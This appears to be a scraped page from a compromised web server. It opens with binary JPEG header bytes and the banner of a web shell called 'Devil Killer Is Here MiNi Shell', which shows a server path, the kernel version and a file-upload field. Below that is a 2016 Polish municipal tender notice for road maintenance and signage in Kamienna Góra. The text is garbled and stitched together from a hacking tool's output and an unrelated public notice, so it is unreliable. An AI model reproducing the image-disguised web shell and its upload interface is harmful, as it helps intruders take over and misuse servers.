JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160322/64732-N-2016.html

<p class="kh_header"><b>Kamienna Góra: Wykonywanie robót związanych z bieżącym utrzymywaniem infrastruktury drogowej, wykonanie oznakowania pionowego i poziomego stałej organizacji ruchu wraz z bieżącym uzupełnianiem oznakowania drogowego oraz naprawa nawierzchni dróg gruntowych zarządzanych przez Gminę Miejską Kamienna Góra</b><br>
<b>Numer ogłoszenia: 64732 - 2016; data zamieszczenia: 22.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kamienna Góra , Plac Grunwaldzki 1, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 6455124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kamiennagora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie robót związanych z bieżącym utrzymywaniem infrastruktury drogowej, wykonanie oznakowania pionowego i poziomego stałej organizacji ruchu wraz z bieżącym uzupełnianiem oznakowania drogowego oraz naprawa nawierzchni dróg gruntowych zarządzanych przez Gminę Miejską Kamienna Góra.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie robót związanych z bieżącym utrzymywaniem infrastruktury drogowej, wykonanie oznakowania pionowego i poziomego stałej organizacji ruchu wraz z bieżącym uzupełnianiem oznakowania drogowego oraz naprawa nawierzchni dróg gruntowych zarządzanych przez Gminę Miejską Kamienna Góra.

Zamówienie obejmuje trzy części. Wykonawca może złożyć ofertę na dowolną ilość części zamówienia.

Część I zamówienia:
W ramach robót przewiduje się wykonanie:
1.Remontów cząstkowych mieszanką mineralno - asfaltową na gorąco wytworzoną na otoczarni lub na budowie w recyklerze (dotyczy okresu zimowego):
a)	z obcięciem krawędzi uszkodzenia:
-	obcięcie krawędzi uszkodzenia,
-	oczyszczenie uszkodzonych miejsc z usunięciem rumoszu, pyłu i ewentualnie wody,
-	skropienie dna i krawędzi emulsją asfaltową (przy zastosowaniu mieszanek mineralno-asfaltowych, alternatywnie można okleić krawędzie taśmą kauczukowo - asfaltową),
-	rozłożenie mieszanki mineralno - asfaltowej o uziarnieniu dostosowanym do głębokości uszkodzenia w jednej lub dwóch warstwach,
-	zagęszczenie rozłożonej mieszanki,
b)bez obcięcia krawędzi uszkodzenia:
-	usunięcie z wyboju luźnych odłamków nawierzchni,
-	oczyszczenie wyboju z zanieczyszczeń, pyłu i ewentualnie wody,
-	skropienie dna i bocznych ścianek wyboju,
-	rozłożenie mieszanki mineralno - asfaltowej,
-	zagęszczenie rozłożonej mieszanki.
2. Napraw powierzchniowych uszkodzeń (w tym wybojów) przy użyciu specjalnych remonterów poprzez wprowadzenie pod ciśnieniem mieszanki kruszywa zmodyfikowaną emulsją asfaltową w oczyszczone sprężonym powietrzem uszkodzenia.
3. Prac związanych z bieżącym utrzymaniem infrastruktury drogowej, polegających w szczególności na:
-remoncie cząstkowym nawierzchni z kostki betonowej 8cm, ułożonej na podsypce cementowo-piaskowej,
-remoncie cząstkowym nawierzchni z płyt betonowych 35cm x 35cm, ułożonych na podsypce cementowo-piaskowej,
-ustawieniu obrzeża betonowego 8cm x 30cm x 100cm,
-przestawieniu krawężnika kamiennego na podsypce cementowo-piaskowej, wraz z wcześniejszym wykonaniem ławy z oporem z betonu (C12/15 - B15),
-remoncie cząstkowym nawierzchni z kostki kamiennej nieregularnej ułożonej na podsypce cementowo-piaskowej 9/11cm,
-remoncie cząstkowym nawierzchni z kostki kamiennej nieregularnej ułożonej na podsypce cementowo-piaskowej 16/18cm.
Wykonawca zobowiązany jest mieć dostęp do korzystania z wytwórni stacjonarnej (otoczarni) o mieszaniu cyklicznym lub ciągłym do wytwarzania mieszanek mineralno-asfaltowych o standardzie I.
Przewidziane do realizacji roboty będą realizowane do wysokości środków przeznaczonych na ten cel przez Zamawiającego i będą się odbywały na zasadach określonych w Istotnych postanowieniach umowy.

Sposób wykonania i odbioru prac będących przedmiotem niniejszego postępowania opisany jest w specyfikacji technicznej wykonania i odbioru robót, stanowiącej załącznik do opisu przedmiotu zamówienia.

Prace należy wycenić w oparciu o kalkulację cenową, stanowiącą załącznik do Formularza oferty.

Rozliczenie z Wykonawcą nastąpi kosztorysem powykonawczym.

Ilość robót przewidziana do wykonania będzie uzależniona od rzeczywistych potrzeb Zamawiającego. W przypadku zmniejszenia zakresu rzeczowego robót nie przewiduje się ponownego negocjowania cen jednostkowych.


Część II zamówienia:
Przedmiotem niniejszego zamówienia są prace polegające na wykonaniu oznakowania pionowego i poziomego stałej organizacji ruchu, zmian do istniejącej organizacji ruchu oraz bieżącym uzupełnianiu oznakowania drogowego według potrzeb Zamawiającego.

Wyszczególnienie elementów przewidzianych do realizacji:
1.	Demontaż znaków/tabliczek
2.	Demontaż wysięgników
3.	Demontaż słupków znaków
4.	Montaż słupków z odzysku
5.	Słupki z rury stalowej ocynkowanej średnicy 60mm wraz z montażem
6.	Słupki gięte z rury stalowej ocynkowanej średnicy 60mm wraz z montażem
7.	Wysięgniki z rury stalowej ocynkowanej średnicy 60mm wraz z montażem
8.	Montaż znaków z odzysku
9.	Znaki ostrzegawcze A-7 wielkości średnie pokryte folią odblaskową typu 2 wraz z montażem
10.	Znaki ostrzegawcze wielkości małe pokryte folią odblaskową typu 1 wraz z montażem
11.	Znaki zakazu wielkości średnie B-20 pokryte folią odblaskową typu 1 wraz z montażem
12.	Znaki zakazu wielkości małe B-2 pokryte folią odblaskową typu 2 wraz z montażem
13.	Znaki zakazu i nakazu wielkości średnie pokryte folią odblaskową typu 1 wraz z montażem
14.	Znaki zakazu i nakazu wielkości małe pokryte folią odblaskową typu 1 wraz z montażem
15.	Znaki informacyjne D-6 wielkości małe pokryte folią odblaskową typu 2 wraz z montażem
16.	Znaki informacyjne wielkości małe pokryte folią odblaskową typu 1 wraz z montażem
17.	Znaki informacyjne D-40, D-41, D-46, D-47 pokryte folią odblaskową typu 1 wraz z montażem
18.	Tabliczki pod znaki pokryte folią odblaskową typu 1 wraz z montażem
19.	Znaki U-9 do oznakowania skrajni drogowej pokryte folią odblaskową typu 1 wraz z montażem
20.	Pozostałe znaki drogowe pokryte folią odblaskową typu 1 wraz z montażem
21.	Znaki drogowe pokryte folią odblaskową bez montażu
22.	Wykonanie oznakowania poziomego (znaki P-10, P-19, P-20, P-21, P-24) w technologii cienkowarstwowej
23.	Usuwanie starego oznakowania poziomego poprzez frezowanie lub piaskowanie
24.	Lustro prostokątne
25.	Słupek ozdobny 
26.	Poprawa słupka
27.	Tablice drogowe u-3-d
28.	Oznakowanie poziome masą chemoutwardzalną
29.	Montaż słupka wyjmowanego
30.	Lustro drogowe

Sposób wykonania i odbioru prac będących przedmiotem niniejszego postępowania opisany jest w specyfikacji technicznej wykonania i odbioru robót, stanowiącej załącznik do opisu przedmiotu zamówienia.

Prace należy wycenić w oparciu o kalkulację cenową, stanowiącą załącznik do Formularza oferty.

Rozliczenie z Wykonawcą nastąpi kosztorysem powykonawczym.

Ilość prac przewidziana do wykonania będzie uzależniona od rzeczywistych potrzeb Zamawiającego. W przypadku zmniejszenia zakresu rzeczowego prac nie przewiduje się ponownego negocjowania cen jednostkowych.

Przewidziane do realizacji prace będą realizowane do wysokości środków przeznaczonych na ten cel przez Zamawiającego i będą się odbywały na zasadach określonych w Istotnych postanowieniach umowy.
Jeżeli prace nie będą odpowiadały opisowi pozycji w kalkulacji cenowej, Wykonawca uzgodni z Zamawiającym ceny jednostkowe tych prac. 

Konstrukcja i sposób umieszczania oznakowania pionowego, poziomego, urządzeń bezpieczeństwa ruchu drogowego oraz inne elementy oznakowania powinna być zgodna z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r., nr 220, poz. 2181).

Wymiary i zdjęcia słupka ozdobnego oraz wyjmowanego:

Słupek ozdobny (poz. 25 Kalkulacji cenowej): 
- długość całkowita: 90 cm
- obwód: ok. 25 cm
- średnica: 80 mm

Słupek wyjmowany (poz. 29 Kalkulacji cenowej):
- długość całkowita: 115 cm
- długość (części) słupka wystającej ponad nawierzchnię: 90 cm
- obwód: ok. 25 cm
- średnica: 80 mm


Część III zamówienia:

Przedmiotem zamówienia jest wykonanie robót polegających na naprawie nawierzchni dróg gruntowych i terenów wskazanych przez Zamawiającego oraz transport kruszyw i ziemi.

W ramach niniejszego zamówienia przewiduje się m.in.:
1.	Pracę samochodu 10t wraz z operatorem.
2.	Pracę koparko-ładowarki wraz z operatorem.
3.	Pracę samochodu pod koparkę 10t wraz z operatorem.
4.	Pracę zagęszczarki płytowo-wibracyjnej wraz z operatorem. 
Sposób wykonania i odbioru robót będących przedmiotem niniejszego zamówienia opisany jest w specyfikacji technicznej wykonania i odbioru robót, stanowiącej załącznik do opisu przedmiotu zamówienia.

Roboty należy wycenić w oparciu o kalkulację cenową, stanowiącą załącznik do Formularza oferty.

Rozliczenie z Wykonawcą nastąpi kosztorysem powykonawczym.

Ilość robót przewidziana do wykonania będzie uzależniona od rzeczywistych potrzeb Zamawiającego. W przypadku zmniejszenia zakresu rzeczowego prac nie przewiduje się ponownego negocjowania cen jednostkowych.

Przewidziane do realizacji roboty będą realizowane do wysokości środków przeznaczonych na ten cel przez Zamawiającego i będą się odbywały na zasadach określonych w Istotnych postanowieniach umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.21-4, 50.23.00.00-6, 34.99.22.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I zamówienia:
Wykonawca winien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej:
- 2 roboty podobne, tj. polegające na remoncie cząstkowym nawierzchni pasa drogowego przy użyciu betonu asfaltowego (mieszanka na gorąco) na powierzchni min. 500m2 (słownie: pięćset metrów kwadratowych) o wartości nie mniejszej niż 40 000,00 zł brutto (słownie: czterdzieści tysięcy złotych) za każdą robotę;
-1 robotę podobną, tj. polegającą na wykonaniu prac brukarskich (w tym: remont cząstkowy nawierzchni z kostki betonowej, remont cząstkowy nawierzchni z kostki kamiennej, ustawienie obrzeża betonowego) o wartości nie mniejszej niż 10 000,00 zł brutto (słownie: dziesięć tysięcy złotych)

Część II zamówienia:
Wykonawca winien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej 2 roboty podobne, tj. polegające na wykonaniu oznakowania pionowego i poziomego o wartości nie mniejszej niż 30 000,00 zł brutto (słownie: trzydzieści tysięcy złotych) za każdą robotę

Część III zamówienia:
Wykonawca winien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej 1 robotę podobną, tj. polegającą na naprawie nawierzchni dróg gruntowych oraz transporcie kruszyw i ziemi o wartości nie mniejszej niż 30 000,00 zł brutto (słownie: trzydzieści tysięcy złotych)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I zamówienia:
Wykonawca winien wykazać, że dysponuje co najmniej następującymi narzędziami i urządzeniami technicznymi w ilości minimum po 1 sztuce:
- płyta wibracyjna o masie min. 200 kg,
- piła mechaniczna do cięcia nawierzchni i elementów betonowych,
- sprężarka z młotem pneumatycznym lub młot spalinowy,
- samochód samowyładowczy z zamontowanym termosem (lub możliwością jego zamontowania) lub z przykryciem brezentowym,
- koparko-ładowarka,
- samochód ciężarowy do przewozu towarów sypkich o ładowności co najmniej 5t,
- remonter (patcher)ciśnieniowy do naprawy uszkodzeń powierzchniowych (w tym wybojów),
- recykler o wydajności min. 1500 kg/h,
- walec prowadzony wibracyjny o masie min. 500 kg.

Część II zamówienia:
Wykonawca winien wykazać, że dysponuje co najmniej następującymi narzędziami i urządzeniami technicznymi:
- samochód przystosowany do przewozu osób, narzędzi i części zamiennych - 1 szt.,
- śrutownica lub frezarka do usuwania oznakowania poziomego - 1 szt.,
- malowarka samojezdna - 1 szt.

Część III zamówienia:
Wykonawca winien wykazać, że dysponuje co najmniej następującymi narzędziami i urządzeniami technicznymi w ilości minimum po 1 sztuce:
- równiarka drogowa,
- płyta wibracyjna o masie min. 200 kg,
- samochód ciężarowy do przewozu towarów sypkich o ładowności co najmniej 5 t,
- walec do pracy na drogach gruntowych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I zamówienia:
Wykonawca winien wykazać, że dysponuje jedną osobą pełniącą funkcję Kierownika Robót stosownie do przepisów ustawy Prawo Budowlane, posiadającą wykształcenie techniczne i uprawnienia budowlane do kierowania robotami w specjalności drogowej oraz będącą członkiem właściwej terytorialnie Izby Inżynierów Budownictwa

Część III zamówienia:
Wykonawca winien wykazać, że dysponuje jedną osobą pełniącą funkcję Kierownika Robót stosownie do przepisów ustawy Prawo Budowlane, posiadającą wykształcenie techniczne i uprawnienia budowlane do kierowania robotami w specjalności drogowej oraz będącą członkiem właściwej terytorialnie Izby Inżynierów Budownictwa</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I zamówienia:
Wykonawca winien wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość dokonania zmiany umowy oraz warunki takiej zmiany zostały określone w pkt 23 specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kamiennagora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kamienna Góra
Plac Grunwaldzki 1
58-400 Kamienna Góra
Wydział Zamówień Publicznych, Inwestycji i Funduszy Zewnętrznych (pok. 308).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2016 godzina 11:45, miejsce: Urząd Miasta Kamienna Góra
Plac Grunwaldzki 1
58-400 Kamienna Góra
Sekretariat (pok. 209).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie robót związanych z bieżącym utrzymaniem infrastruktury drogowej na drogach Gminy Miejskiej Kamienna Góra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach robót przewiduje się wykonanie:
1.Remontów cząstkowych mieszanką mineralno - asfaltową na gorąco wytworzoną na otoczarni lub na budowie w recyklerze (dotyczy okresu zimowego):
a)	z obcięciem krawędzi uszkodzenia:
-obcięcie krawędzi uszkodzenia,
-oczyszczenie uszkodzonych miejsc z usunięciem rumoszu, pyłu i ewentualnie wody,
-	skropienie dna i krawędzi emulsją asfaltową (przy zastosowaniu mieszanek mineralno-asfaltowych, alternatywnie można okleić krawędzie taśmą kauczukowo - asfaltową),
-	rozłożenie mieszanki mineralno - asfaltowej o uziarnieniu dostosowanym do głębokości uszkodzenia w jednej lub dwóch warstwach,
-	zagęszczenie rozłożonej mieszanki,
b)bez obcięcia krawędzi uszkodzenia:
-	usunięcie z wyboju luźnych odłamków nawierzchni,
